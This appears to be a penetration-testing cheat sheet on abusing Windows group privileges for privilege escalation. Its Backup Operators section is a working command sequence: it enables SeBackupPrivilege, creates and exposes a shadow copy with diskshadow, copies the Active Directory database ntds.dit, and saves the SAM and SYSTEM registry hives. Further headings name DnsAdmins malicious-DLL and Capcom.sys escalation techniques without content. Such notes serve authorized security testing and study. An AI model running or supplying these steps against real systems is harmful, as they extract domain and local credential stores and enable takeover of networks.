Windows Group Privileges
Backup Operators
PS> Import-Module .\SeBackupPrivilegeUtils.dll
PS> Import-Module .\SeBackupPrivilegeCmdLets.dllPS> whoami /all
PS> Get-SeBackupPrivilege
## Enabling the SeBackupPrivilege
PS> Set-SeBackupPrivilegePS> Copy-FileSeBackupPrivilege '<path> <file>' .\file.txt
## Using Diskshadow
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
PS> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
## Backing up SAM and SYSTEM Registry Hives
reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive
## Copying files with RoboCopy
cmd> robocopy /B E:\Windows\NTDS .\ntds ntds.ditEvent Log Readers
Searching Security Logs Using wevtutil
Searching Security Logs Using Get-WinEvent
DnsAdmins
Creating a malicious DLL
Creating a WPAD Record
Server Operators

Print Operators
Using Capcom.sys for Privilege Escalation
Last updated